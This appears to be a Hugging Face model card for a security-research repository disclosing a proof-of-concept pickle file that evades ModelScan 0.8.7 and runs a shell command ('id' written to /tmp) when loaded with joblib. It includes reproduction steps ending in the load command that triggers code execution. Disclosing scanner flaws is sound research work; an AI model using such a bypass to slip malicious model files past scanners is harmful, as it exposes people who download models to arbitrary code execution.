Hugging Face's logo

baguette168
/
modelscan-bypass-poc

Tabular Classification
Joblib
security
cybersecurity
pickle
deserialization
arbitrary-code-execution
poc
modelscan
Model card Files
xet
 Community
modelscan-bypass-poc / README.md
baguette168's picture
baguette168
Update README.md
55a2fad verified
preview code
|
raw
history blame contribute delete
987 Bytes
metadata 
license: mit
tags:
  - security
  - cybersecurity
  - pickle
  - joblib
  - deserialization
  - arbitrary-code-execution
  - poc
  - modelscan
library_name: joblib
pipeline_tag: tabular-classification

ModelScan Bypass PoC - Security Research

⚠️ This repository contains a proof-of-concept for security research purposes only.

This model file demonstrates a vulnerability in ModelScan's pickle scanner that allows arbitrary code execution while evading detection.

Do NOT load this file with joblib.load() on a production system.

Details

  • File: malicious_model.joblib
  • Scanner: ModelScan 0.8.7
  • Result: "No issues found" (false negative)
  • Actual behavior: Executes id > /tmp/modelscan_bypass_poc.txt on load

Reproduction 

pip install joblib modelscan

modelscan --path malicious_model.joblib
# Output: "No issues found"

# WARNING: The next command executes arbitrary code
python -c "import joblib; joblib.load('malicious_model.joblib')"